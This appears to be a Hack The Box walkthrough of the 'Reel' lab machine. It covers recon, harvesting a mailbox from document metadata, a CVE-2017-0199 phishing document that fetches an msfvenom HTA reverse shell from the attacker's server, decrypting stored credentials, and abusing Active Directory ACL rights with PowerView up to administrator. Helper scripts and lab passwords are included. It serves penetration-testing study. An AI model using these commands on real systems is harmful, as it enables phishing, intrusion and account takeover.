HTB Walkthrough (Active Directory 101: Reel)

Scan the target with nmap
nmap -A -T4 10.10.10.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST
Nmap scan report for 10.10.10.77
Host is up (0.55s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst:
|_  SYST: Windows_NT
22/tcp open  ssh     OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
|   2048 8220c3bd16cba29c88871d6c1559eded (RSA)
|   256 232bb80a8c1cf44d8d7e5e6458803345 (ECDSA)
|_  256 ac8bde251db7d838389b9c16bff63fed (ED25519)
25/tcp open  smtp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello:
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help:
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions:
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie:
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.93%I=7%D=1/18%Time=63C79217%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows 7 Professional (86%), Microsoft Windows 8.1 Update 1 (85%), Microsoft Windows Phone 7.5 or 8.0 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   636.94 ms 10.10.16.1
2   637.07 ms 10.10.10.77

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.69 seconds

nmap identifies a Windows Server 2012 host (the "Version 6.3.9600" banner seen later confirms 2012 R2) with FTP, SSH and SMTP open. The SMTP service announces itself as REEL, offers AUTH LOGIN/PLAIN over plaintext and advertises VRFY.
Try logging in to FTP and SSH.
Anonymous FTP login is allowed:
ftp 10.10.10.77
    Connected to 10.10.10.77.
    220 Microsoft FTP Service
    Name (10.10.10.77:kali): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 User logged in.
    Remote system type is Windows_NT.
    ftp> dir
    229 Entering Extended Passive Mode (|||41001|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM       <DIR>          documents
    226 Transfer complete.
    ftp>
Information gathering
The following files were found in the documents directory and downloaded:
ftp> dir
    229 Entering Extended Passive Mode (|||41007|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM                 2047 AppLocker.docx
    05-28-18  01:01PM                  124 readme.txt
    10-31-17  09:13PM                14581 Windows Event Forwarding.docx
    226 Transfer complete.
    ftp> get readme.txt
    local: readme.txt remote: readme.txt
    229 Entering Extended Passive Mode (|||41008|)
    150 Opening ASCII mode data connection.
    100% |*******************************|   124        0.19 KiB/s    00:00 ETA
    226 Transfer complete.
    124 bytes received in 00:00 (0.13 KiB/s)
    ftp> get Windows\ Event\ Forwarding.docx
    local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
    229 Entering Extended Passive Mode (|||41010|)
    150 Opening ASCII mode data connection.
    100% |*******************************| 14581       14.21 KiB/s    00:00 ETAftp: Reading from network: Interrupted system call
    0% |                               |    -1        0.00 KiB/s    --:-- ETA
    226 Transfer complete.
    WARNING! 51 bare linefeeds received in ASCII mode.
    File may not have transferred correctly.
    ftp> dir
    229 Entering Extended Passive Mode (|||41011|)
    125 Data connection already open; Transfer starting.
    05-28-18  11:19PM                 2047 AppLocker.docx
    05-28-18  01:01PM                  124 readme.txt
    10-31-17  09:13PM                14581 Windows Event Forwarding.docx
    226 Transfer complete.
    ftp> get AppLocker.docx
    local: AppLocker.docx remote: AppLocker.docx
    229 Entering Extended Passive Mode (|||41012|)
    150 Opening ASCII mode data connection.
    100% |*******************************|  2047        2.27 KiB/s    00:00 ETA
    226 Transfer complete.
    WARNING! 9 bare linefeeds received in ASCII mode.
    File may not have transferred correctly.
    2047 bytes received in 00:01 (1.70 KiB/s)
    ftp> exit
    221 Goodbye.
Use exiftool to view the metadata of "Windows Event Forwarding.docx". (The transfers above ran in ASCII mode and warned about bare linefeeds; a .docx is a ZIP archive, so type `binary` in the ftp client before `get` if a file fails to open.)
Command: exiftool "Windows Event Forwarding.docx"
Output:
    ExifTool Version Number         : 12.49
    File Name                       : Windows Event Forwarding.docx
    Directory                       : .
    File Size                       : 15 kB
    File Modification Date/Time     : 2023:01:18 01:58:38-05:00
    File Access Date/Time           : 2023:01:18 01:59:18-05:00
    File Inode Change Date/Time     : 2023:01:18 01:58:38-05:00
    File Permissions                : -rw-r--r--
    File Type                       : DOCX
    File Type Extension             : docx
    MIME Type                       : application/vnd.openxmlformats-officedocument.wordprocessingml.document
    Zip Required Version            : 20
    Zip Bit Flag                    : 0x0006
    Zip Compression                 : Deflated
    Zip Modify Date                 : 1980:01:01 00:00:00
    Zip CRC                         : 0x82872409
    Zip Compressed Size             : 385
    Zip Uncompressed Size           : 1422
    Zip File Name                   : [Content_Types].xml
    Creator                         : nico@megabank.com
    Revision Number                 : 4
    Create Date                     : 2017:10:31 18:42:00Z
    Modify Date                     : 2017:10:31 18:51:00Z
    Template                        : Normal.dotm
    Total Edit Time                 : 5 minutes
    Pages                           : 2
    Words                           : 299
    Characters                      : 1709
    Application                     : Microsoft Office Word
    Doc Security                    : None
    Lines                           : 14
    Paragraphs                      : 4
    Scale Crop                      : No
    Heading Pairs                   : Title, 1
    Titles Of Parts                 :
    Company                         :
    Links Up To Date                : No
    Characters With Spaces          : 2004
    Shared Doc                      : No
    Hyperlinks Changed              : No
    App Version                     : 14.0000
The Creator field reveals the mailbox nico@megabank.com.
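The same harvest can be done without exiftool, and extended to the parts exiftool does not print. The following is an added example, not code from the original write-up: a .docx is a ZIP archive whose docProps/core.xml carries the fields exiftool reports as Creator and Last Modified By, and any XML part (body text, comments, relationships) can leak e-mail addresses or UNC paths. The sample document it builds is a constructed stand-in for "Windows Event Forwarding.docx" (the UNC path and second address in it are invented for the demonstration).

```python
"""Extract author metadata and embedded addresses from a .docx without exiftool."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
UNC_RE = re.compile(r'\\\\[\w.-]+\\[^\s<>";,]+')


def core_properties(docx_bytes: bytes) -> dict:
    """Return creator / lastModifiedBy / created / modified from docProps/core.xml."""
    props = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return props
        root = ET.fromstring(z.read("docProps/core.xml"))
    for path, key in (("dc:creator", "creator"),
                      ("cp:lastModifiedBy", "lastModifiedBy"),
                      ("dcterms:created", "created"),
                      ("dcterms:modified", "modified")):
        el = root.find(path, NS)
        if el is not None and el.text:
            props[key] = el.text.strip()
    return props


def harvest(docx_bytes: bytes) -> dict:
    """Scan every XML and .rels part for e-mail addresses and UNC paths."""
    emails, uncs = set(), set()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if name.endswith((".xml", ".rels")):
                text = z.read(name).decode("utf-8", "replace")
                emails.update(EMAIL_RE.findall(text))
                uncs.update(UNC_RE.findall(text))
    return {"emails": sorted(emails), "unc_paths": sorted(uncs)}


def build_sample_docx() -> bytes:
    """Constructed stand-in for the real document (metadata values mirror the exiftool output)."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}" '
        f'xmlns:dcterms="{NS["dcterms"]}">'
        "<dc:creator>nico@megabank.com</dc:creator>"
        "<cp:lastModifiedBy>nico@megabank.com</cp:lastModifiedBy>"
        "<dcterms:created>2017-10-31T18:42:00Z</dcterms:created>"
        "<dcterms:modified>2017-10-31T18:51:00Z</dcterms:modified>"
        "</cp:coreProperties>"
    )
    body = (  # invented body text: a UNC path and a second address hidden in the document
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Forward events to \\\\wef01.htb.local\\logs "
        "and mail admin@megabank.com</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("docProps/core.xml", core)
        z.writestr("word/document.xml", body)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for k, v in core_properties(data).items():
        print(f"{k:16}: {v}")
    for k, v in harvest(data).items():
        print(f"{k:16}: {', '.join(v) or '-'}")
```

Run it with the path to a downloaded .docx as the first argument; with no argument it analyses the constructed sample. Scanning every part matters because exiftool only reports the core properties, while addresses typed into the body, comments or tracked changes survive in word/*.xml.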
Try phishing that mailbox to obtain a shell.
CVE used:
    CVE-2017-0199
Download:
    https://github.com/bhdresh/CVE-2017-0199
Brief description:
    CVE-2017-0199 is a logic flaw in Microsoft Office's OLE handling. When Word
    processes an embedded OLE2Link object it fetches the linked content over the
    network and dispatches on the server-supplied Content-Type: a response served
    as application/hta is handed to mshta.exe and executed as script. Because it
    is a logic flaw rather than memory corruption, exploitation does not need to
    bypass mitigations such as ASLR or DEP, so it is highly reliable. No macros
    are involved; the victim only has to open the document.
Generate the reverse-shell payload with msfvenom
    Command:
        msfvenom -p windows/shell_reverse_tcp lhost=10.10.16.13 lport=6666 -f hta-psh -o shell.hta
    Start a Python HTTP server so the target can fetch the HTA
    Command:
        python3 -m http.server 80
Generate the RTF payload document
    Command:
        python2 cve-2017-0199_toolkit.py -M gen -w hi.rtf -u http://10.10.16.13/shell.hta -t rtf -x 0
Start nc to catch the reverse shell
Command:
    nc -nvlp 6666
Send the payload document to the target mailbox with sendEmail. The mail server on 10.10.10.77 accepts the message without authentication and with a spoofed megabank.com sender:
Command:
    sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a hi.rtf -s 10.10.10.77 -v 
Output:
    Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => Connecting to 10.10.10.77:25
    Jan 18 03:59:55 kali sendEmail[40007]: DEBUG => My IP address is: 10.10.16.13
    Jan 18 03:59:55 kali sendEmail[40007]: SUCCESS => Received:     220 Mail Service ready
    Jan 18 03:59:55 kali sendEmail[40007]: INFO => Sending:         EHLO kali
    Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
    Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         MAIL FROM:<mac@megabank.com>
    Jan 18 03:59:56 kali sendEmail[40007]: SUCCESS => Received:     250 OK
    Jan 18 03:59:56 kali sendEmail[40007]: INFO => Sending:         RCPT TO:<nico@megabank.com>
    Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     250 OK
    Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending:         DATA
    Jan 18 03:59:57 kali sendEmail[40007]: SUCCESS => Received:     354 OK, send.
    Jan 18 03:59:57 kali sendEmail[40007]: INFO => Sending message body
    Jan 18 03:59:57 kali sendEmail[40007]: Setting content-type: text/plain
    Jan 18 03:59:57 kali sendEmail[40007]: DEBUG => Sending the attachment [hi.rtf]
    Jan 18 04:00:09 kali sendEmail[40007]: SUCCESS => Received:     250 Queued (12.156 seconds)
    Jan 18 04:00:09 kali sendEmail[40007]: Email was sent successfully!  From: <mac@megabank.com> To: <nico@megabank.com> Subject: [Invoice Attached] Attachment(s): [hi.rtf] Server: [10.10.10.77:25]
After a short while the HTA is fetched and nc receives a shell.
    The Python HTTP server logs the request:
        python3 -m http.server 80
            Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
            10.10.10.77 - - [18/Jan/2023 04:00:25] "GET /shell.hta HTTP/1.1" 200 -
            10.10.10.77 - - [18/Jan/2023 04:00:26] "GET /shell.hta HTTP/1.1" 200 -
    nc receives the shell:
    nc -nvlp 6666
        listening on [any] 6666 ...
        connect to [10.10.16.13] from (UNKNOWN) [10.10.10.77] 60488
        Microsoft Windows [Version 6.3.9600]
        (c) 2013 Microsoft Corporation. All rights reserved.

        C:\Windows\system32>
Get the user flag
    C:\Users\nico\Desktop>type user.txt
Alternative: use Metasploit instead of nc. The office_word_hta module both writes the document (msf.doc under ~/.msf4/local/) and serves the HTA itself on srvhost, so the separate msfvenom and http.server steps are not needed. The attacker IP in this run differs from the earlier one; use your current tun0 address.
    msfconsole 
    msf > use exploit/windows/fileformat/office_word_hta
    msf > set lhost 10.10.14.17
    msf > set lport 4444
    msf > set srvhost 10.10.14.17
    msf > run
    sendEmail -f mac@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v 
Obtaining the Tom account
The file cred.xml on the current user's desktop is sensitive: it is the XML produced by 
running Export-CliXml on a PSCredential object, the PowerShell type used to hold a 
user name together with a password stored as a SecureString. Export-CliXml protects 
the SecureString with DPAPI under the exporting user's master key, so it only decrypts 
as that user (or offline with that user's DPAPI master key), which is why the 
extraction is done from the shell running as nico rather than on the attacking machine.
Extract the password with PowerShell:
    powershell -c "$cred = Import-CliXml -Path c:\Users\nico\Desktop\cred.xml;$cred.GetNetworkCredential() | Format-List *"
Output:   
    UserName       : Tom
    Password       : 1ts-mag1c!!!
    SecurePassword : System.Security.SecureString
    Domain         : HTB
This yields the account htb\Tom:1ts-mag1c!!!
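To see why the file has to be decrypted in nico's context, it helps to look at what Export-CliXml actually wrote. The following is an added example, not code from the original write-up: it parses a CliXml PSCredential export, splits the account the way GetNetworkCredential() reports it, and checks whether the SecureString is a DPAPI blob. The embedded cred.xml is a constructed stand-in whose blob is a genuine DPAPI header followed by zero filler, not the real secret from the box.

```python
"""Read a PSCredential saved with Export-CliXml and report how its password is protected."""
import sys
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# DPAPI blob header: version 1 followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte order.
DPAPI_MAGIC = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
FILLER_HEX = "00" * 48  # constructed stand-in for the rest of the blob

# Constructed cred.xml in the shape Export-CliXml produces for a PSCredential.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\\Tom</S>
      <SS N="Password">{DPAPI_MAGIC.hex()}{FILLER_HEX}</SS>
    </Props>
  </Obj>
</Objs>
"""


def parse_pscredential(xml_data) -> dict:
    """Return the user name and the raw SecureString blob of the first PSCredential in the file."""
    ns = {"ps": PS_NS}
    root = ET.fromstring(xml_data)  # bytes are fine; expat honours a UTF-16 BOM
    found = {"username": None, "blob": None}
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
        if "System.Management.Automation.PSCredential" not in types:
            continue
        for prop in obj.findall("ps:Props/*", ns):
            if prop.get("N") == "UserName":
                found["username"] = prop.text
            elif prop.get("N") == "Password" and prop.tag == f"{{{PS_NS}}}SS":
                found["blob"] = bytes.fromhex(prop.text.strip())
        break
    return found


def split_account(username: str):
    """'HTB\\Tom' -> ('HTB', 'Tom'), matching Domain/UserName from GetNetworkCredential()."""
    if username and "\\" in username:
        domain, _, user = username.partition("\\")
        return domain, user
    return "", username


def classify_blob(blob: bytes) -> str:
    """Say how the SecureString was protected and therefore where it can be decrypted."""
    if not blob:
        return "no SecureString present"
    if blob.startswith(DPAPI_MAGIC):
        return ("DPAPI, user master key: run Import-CliXml as the exporting user "
                "(or decrypt offline with that user's DPAPI master key)")
    return "not a DPAPI blob (unexpected for Export-CliXml on Windows)"


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CLIXML
    cred = parse_pscredential(data)
    domain, user = split_account(cred["username"])
    print(f"Domain   : {domain}")
    print(f"UserName : {user}")
    print(f"Password : {classify_blob(cred['blob'])}")
```

Pass the path of a real cred.xml as the first argument (the file is read as bytes because Windows PowerShell writes it as UTF-16). The script deliberately stops at classification: the blob cannot be opened without nico's master key, which is exactly why the page runs Import-CliXml inside the shell obtained as nico.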
Start an SMB share on the attacking machine to move files
Command (impacket's smbserver.py; add -smb2support if the client refuses SMB1):
    python3 smbserver.py share /home/kali/Desktop/temp/
Log in over SSH as htb\Tom:1ts-mag1c!!! and gather information; the following directory is of interest:
    C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

    05/29/2018  07:57 PM    <DIR>          .
    05/29/2018  07:57 PM    <DIR>          ..
    11/16/2017  11:50 PM           112,225 acls.csv
    10/28/2017  08:50 PM             3,549 BloodHound.bin
    10/24/2017  03:27 PM           246,489 BloodHound_Old.ps1
    10/24/2017  03:27 PM           568,832 SharpHound.exe
    10/24/2017  03:27 PM           636,959 SharpHound.ps1
                5 File(s)      1,568,054 bytes
                2 Dir(s)   4,937,048,064 bytes free
    Copy acls.csv back to the attacking machine
    Command:
       copy acls.csv \\10.10.16.13\share\
Analyse acls.csv by hand
Two rows stand out (columns: object, object type, principal, principal type, right, allow/deny, inherited):
claire@HTB.LOCAL	USER		tom@HTB.LOCAL	USER	WriteOwner		AccessAllowed	FALSE
Backup_Admins@HTB.LOCAL	GROUP		claire@HTB.LOCAL	USER	WriteDacl		AccessAllowed	FALSE
tom@HTB.LOCAL holds WriteOwner over the claire@HTB.LOCAL account, and claire@HTB.LOCAL holds WriteDacl over the Backup_Admins@HTB.LOCAL group. WriteOwner lets tom make himself the owner of claire's object and then rewrite its DACL; WriteDacl lets claire grant herself any right on the group, including the right to add members.
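Reading a 100 KB CSV by eye does not scale; the chain can be found programmatically. The following is an added example, not code from the original write-up, that loads a BloodHound 1.x acls.csv, keeps only allow ACEs carrying a takeover right, and breadth-first searches for the shortest chain from a starting principal to a target, printing the PowerView action each hop needs (the same actions the privilege escalation section below performs by hand). The header line is an assumption (the page only shows data rows); the two rows from the page are kept verbatim and padded with constructed noise rows. Group-membership edges live in a separate ingestor file and are not merged here, so a right granted to a group tom belongs to would be missed.

```python
"""Find a takeover path in a BloodHound 1.x acls.csv without importing it into Neo4j."""
import csv
import io
import sys
from collections import deque

# Assumed column names of the old ACL ingestor; the page shows only data rows.
HEADER = ("ObjectName,ObjectType,ObjectGuid,PrincipalName,PrincipalType,"
          "ActiveDirectoryRights,ACEType,AccessControlType,IsInherited")

# First two rows are the ones from the page; the rest are constructed noise.
SAMPLE_ACLS = HEADER + """
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,WriteOwner,,AccessAllowed,FALSE
Backup_Admins@HTB.LOCAL,GROUP,,claire@HTB.LOCAL,USER,WriteDacl,,AccessAllowed,FALSE
Backup_Admins@HTB.LOCAL,GROUP,,Domain Admins@HTB.LOCAL,GROUP,GenericAll,,AccessAllowed,TRUE
tom@HTB.LOCAL,USER,,Everyone@HTB.LOCAL,GROUP,ReadProperty,,AccessAllowed,FALSE
claire@HTB.LOCAL,USER,,tom@HTB.LOCAL,USER,GenericAll,,AccessDenied,FALSE
"""

# Rights that hand control of the object to the principal, and the PowerView step abusing each.
# ExtendedRight rows (e.g. force-change-password) need the ACEType column to tell apart; skipped.
ABUSE = {
    "GenericAll": "full control: Set-DomainUserPassword (user) / Add-DomainGroupMember (group)",
    "WriteOwner": "Set-DomainObjectOwner -OwnerIdentity <you>, then Add-DomainObjectAcl "
                  "-Rights ResetPassword (user) or WriteMembers (group)",
    "WriteDacl": "Add-DomainObjectAcl -Rights ResetPassword (user) or WriteMembers (group)",
    "GenericWrite": "Set-DomainObject on any attribute (user: SPN for targeted Kerberoast; group: member)",
}


def load_edges(csv_text: str) -> dict:
    """Map principal -> [(right, object, object type)] for allow ACEs carrying an abusable right."""
    edges = {}
    for row in csv.DictReader(io.StringIO(csv_text.strip())):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # a Deny ACE grants nothing
        # .NET may list several rights in one cell ("WriteDacl, WriteOwner").
        for right in (r.strip() for r in row["ActiveDirectoryRights"].split(",")):
            if right in ABUSE:
                edges.setdefault(row["PrincipalName"], []).append(
                    (right, row["ObjectName"], row["ObjectType"]))
    return edges


def find_path(edges: dict, start: str, target: str):
    """Breadth-first search for the shortest chain of abusable rights from start to target."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for right, obj, otype in edges.get(node, []):
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, path + [(node, right, obj, otype)]))
    return None


def abuse_plan(path) -> list:
    """Turn a path into the ordered PowerView actions needed to walk it."""
    return [f"{src} -[{right}]-> {dst} ({otype}): {ABUSE[right]}"
            for src, right, dst, otype in path]


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_ACLS
    start = sys.argv[2] if len(sys.argv) > 2 else "tom@HTB.LOCAL"
    target = sys.argv[3] if len(sys.argv) > 3 else "Backup_Admins@HTB.LOCAL"
    route = find_path(load_edges(text), start, target)
    print("\n".join(abuse_plan(route)) if route else f"no path from {start} to {target}")
```

Usage: `python3 acl_path.py acls.csv tom@HTB.LOCAL Backup_Admins@HTB.LOCAL`. On the sample data it reports the two-hop chain WriteOwner then WriteDacl and ignores both the Deny ACE and the read-only right, which is the filtering a human analyst applies implicitly when picking those two rows out of the file.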
Privilege escalation
Abuse the ACL rights with PowerView
Download: https://github.com/PowerShellMafia/PowerSploit
Location in the repository: PowerSploit-master\PowerSploit-master\Recon
Steps:
     . .\PowerView.ps1    # dot-source PowerView into the session
     Make tom the owner of claire's object, then grant tom the right to reset her password
    Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
    Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword -Verbose
    Set claire's password to Ab345678123!@#
    $cred = ConvertTo-SecureString "Ab345678123!@#" -AsPlainText -force
    Set-DomainUserPassword -identity claire -accountpassword $cred
    Log in over SSH as claire
    ssh claire@10.129.5.10
    The backup_admins group currently contains only the user ranj
    net group backup_admins
    Add claire to backup_admins, then log in again so the new membership is present in the logon token
    net group backup_admins claire /add
    net group backup_admins
    (WriteDacl by itself does not grant the right to edit the group's member attribute. If the add is refused, first use the WriteDacl right to grant claire WriteMembers on the group, Add-DomainObjectAcl -TargetIdentity Backup_Admins -PrincipalIdentity claire -Rights WriteMembers, and retry.)
Resetting claire's password is destructive and logged on the domain controller; on a real engagement record the original owner, DACL and group membership so every change can be reverted.
In the Backup Scripts directory, searching the scripts for passwords turns up the administrator password Cr4ckMeIfYouC4n!, which gives Administrator (SYSTEM-level) access to the host.
Summary
nmap shows a Windows Server 2012 host with FTP, SSH and SMTP open, and FTP allows anonymous login.
A docx file is found there; exiftool on "Windows Event Forwarding.docx" reveals a mailbox in its metadata. A CVE-2017-0199
phishing document sent to that mailbox returns an nc reverse shell. Analysing the BloodHound ACL export shows that tom@HTB.LOCAL
has WriteOwner over the claire@HTB.LOCAL account and claire@HTB.LOCAL has WriteDacl over Backup_Admins@HTB.LOCAL;
abusing those rights with PowerView escalates privileges, after which searching the Backup Scripts directory for passwords
yields the administrator password Cr4ckMeIfYouC4n! and full control of the host.